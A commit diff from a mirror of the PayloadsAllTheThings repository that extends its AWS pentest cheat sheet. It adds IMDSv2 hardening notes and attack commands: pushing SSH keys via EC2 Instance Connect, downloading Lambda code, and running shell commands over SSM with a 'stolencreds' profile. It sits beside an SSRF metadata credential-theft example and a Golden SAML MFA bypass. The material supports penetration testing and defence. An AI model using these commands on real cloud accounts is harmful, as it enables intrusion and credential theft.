mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
AWS EC2 Instance Connect + Lambda + SSM
This commit is contained in:
parent
9207e0204c
commit
5d87804f71
@ -14,6 +14,9 @@
|
|||||||
* [Admin equivalent permission](#admin-equivalent-permission)
|
* [Admin equivalent permission](#admin-equivalent-permission)
|
||||||
* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
|
* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
|
||||||
* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
|
* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
|
||||||
|
* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
|
||||||
|
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
|
||||||
|
* [AWS - SSM - Command execution](#aws---ssm---command-execution)
|
||||||
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
|
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
|
||||||
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
|
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
|
||||||
* [PenTest:IAMUser/KaliLinux](#)
|
* [PenTest:IAMUser/KaliLinux](#)
|
||||||
@ -162,6 +165,18 @@
|
|||||||
|
|
||||||
## AWS - Metadata SSRF
|
## AWS - Metadata SSRF
|
||||||
|
|
||||||
|
> AWS released an additional security defences against the attack.
|
||||||
|
|
||||||
|
:warning: Only working with IMDSv1.
|
||||||
|
Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
|
||||||
|
|
||||||
|
In order to usr IMDSv2 you must provide a token.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
|
||||||
|
curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
|
||||||
|
```
|
||||||
|
|
||||||
### Method for Elastic Cloud Compute (EC2)
|
### Method for Elastic Cloud Compute (EC2)
|
||||||
|
|
||||||
Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
|
Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
|
||||||
@ -360,13 +375,37 @@ aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
|
|||||||
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
|
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## AWS - Instance Connect - Push an SSH key to EC2 instance
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/
|
||||||
|
$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"
|
||||||
|
$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds
|
||||||
|
```
|
||||||
|
|
||||||
|
## AWS - Lambda - Extract function's code
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed
|
||||||
|
$ aws lambda list-functions --profile uploadcreds
|
||||||
|
$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
|
||||||
|
$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
|
||||||
|
```
|
||||||
|
|
||||||
|
## AWS - SSM - Command execution
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
||||||
|
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
||||||
|
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
||||||
|
```
|
||||||
|
|
||||||
## AWS - Golden SAML Attack
|
## AWS - Golden SAML Attack
|
||||||
|
|
||||||
https://www.youtube.com/watch?v=5dj4vOqqGZw
|
https://www.youtube.com/watch?v=5dj4vOqqGZw
|
||||||
https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/
|
https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/
|
||||||
|
|
||||||
> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user’s password. This attack also bypasses any MFA requirements.
|
> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements.
|
||||||
|
|
||||||
Requirement:
|
Requirement:
|
||||||
* Token-signing private key (export from personnal store using Mimikatz)
|
* Token-signing private key (export from personnal store using Mimikatz)
|
||||||
@ -493,3 +532,5 @@ https://github.com/DenizParlak/Zeus
|
|||||||
* [amazon-guardduty-user-guide PenTest Finding Types - @awsdocs](https://github.com/awsdocs/amazon-guardduty-user-guide/blob/master/doc_source/guardduty_pentest.md)
|
* [amazon-guardduty-user-guide PenTest Finding Types - @awsdocs](https://github.com/awsdocs/amazon-guardduty-user-guide/blob/master/doc_source/guardduty_pentest.md)
|
||||||
* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/)
|
* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/)
|
||||||
* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)
|
* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)
|
||||||
|
* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
|
||||||
|
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
|
Loading…
Reference in New Issue
Block a user